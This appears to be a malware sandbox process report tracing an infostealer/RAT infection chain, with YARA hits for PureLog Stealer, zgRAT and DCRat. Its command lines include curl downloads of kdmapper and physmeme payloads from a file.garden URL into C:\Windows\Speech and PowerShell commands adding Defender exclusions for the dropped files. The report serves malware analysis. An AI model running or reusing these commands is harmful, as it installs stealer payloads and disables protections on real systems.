                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:12:33:23
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\NCTSgL4t0B.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\NCTSgL4t0B.exe"
                                                                                                                                                                                                            Imagebase:0x7ff735da0000
                                                                                                                                                                                                            File size:628'224 bytes
                                                                                                                                                                                                            MD5 hash:76B682B895587819CC3293CC109D3EB1
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:12:33:23
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                            Start time:12:33:27
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                            Imagebase:0x7ff782790000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                            Start time:12:33:27
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                            Imagebase:0x7ff7eef80000
                                                                                                                                                                                                            File size:530'944 bytes
                                                                                                                                                                                                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:12:33:30
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Speech\kdmapper.exe"
                                                                                                                                                                                                            Imagebase:0xde0000
                                                                                                                                                                                                            File size:2'284'739 bytes
                                                                                                                                                                                                            MD5 hash:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 68%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:12:33:30
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                            Imagebase:0x7ff782790000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                            Start time:12:33:30
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                            Imagebase:0x7ff7eef80000
                                                                                                                                                                                                            File size:530'944 bytes
                                                                                                                                                                                                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:12:33:31
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                                                                                                                                                                                            Imagebase:0x250000
                                                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                            Start time:12:33:32
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Speech\physmeme.exe"
                                                                                                                                                                                                            Imagebase:0xae0000
                                                                                                                                                                                                            File size:370'176 bytes
                                                                                                                                                                                                            MD5 hash:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                            Start time:12:33:32
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:12:33:34
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                            Imagebase:0x850000
                                                                                                                                                                                                            File size:65'440 bytes
                                                                                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                            Start time:12:33:46
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:12:33:46
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                            Start time:12:33:46
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Edge\msedge.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Edge/msedge.exe"
                                                                                                                                                                                                            Imagebase:0x160000
                                                                                                                                                                                                            File size:1'963'008 bytes
                                                                                                                                                                                                            MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000000.1467994457.0000000000162000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1537440310.00000000126C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 74%, ReversingLabs
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                            Start time:14:24:38
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"
                                                                                                                                                                                                            Imagebase:0x7ff69ba60000
                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                            Start time:14:24:38
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:14:24:38
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP"
                                                                                                                                                                                                            Imagebase:0x7ff7b92b0000
                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                            Start time:14:24:38
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"
                                                                                                                                                                                                            Imagebase:0x7ff69ba60000
                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:14:24:39
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                            Start time:14:24:39
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP"
                                                                                                                                                                                                            Imagebase:0x7ff7b92b0000
                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'
                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            Imagebase:0x490000
                                                                                                                                                                                                            File size:1'963'008 bytes
                                                                                                                                                                                                            MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Idle.exe, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Idle.exe, Author: Joe Security
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                            • Detection: 74%, ReversingLabs
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Idle.exe
                                                                                                                                                                                                            Imagebase:0xac0000
                                                                                                                                                                                                            File size:1'963'008 bytes
                                                                                                                                                                                                            MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Edge\msedge.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Edge\msedge.exe
                                                                                                                                                                                                            Imagebase:0x6f0000
                                                                                                                                                                                                            File size:1'963'008 bytes
                                                                                                                                                                                                            MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Edge\msedge.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Edge\msedge.exe
                                                                                                                                                                                                            Imagebase:0xd20000
                                                                                                                                                                                                            File size:1'963'008 bytes
                                                                                                                                                                                                            MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat"
                                                                                                                                                                                                            Imagebase:0x7ff782790000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                            Start time:14:24:40
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                                                                            Imagebase:0x7ff6b9840000
                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                            Start time:14:24:41
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\w32tm.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                                            Imagebase:0x7ff67ab10000
                                                                                                                                                                                                            File size:108'032 bytes
                                                                                                                                                                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                            Start time:14:24:44
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                            Imagebase:0x7ff7fb730000
                                                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                            Start time:14:24:48
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Edge\msedge.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Edge\msedge.exe"
                                                                                                                                                                                                            Imagebase:0xfb0000
                                                                                                                                                                                                            File size:1'963'008 bytes
                                                                                                                                                                                                            MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                                            Start date:30/09/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat"
                                                                                                                                                                                                            Imagebase:0x7ff782790000
                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
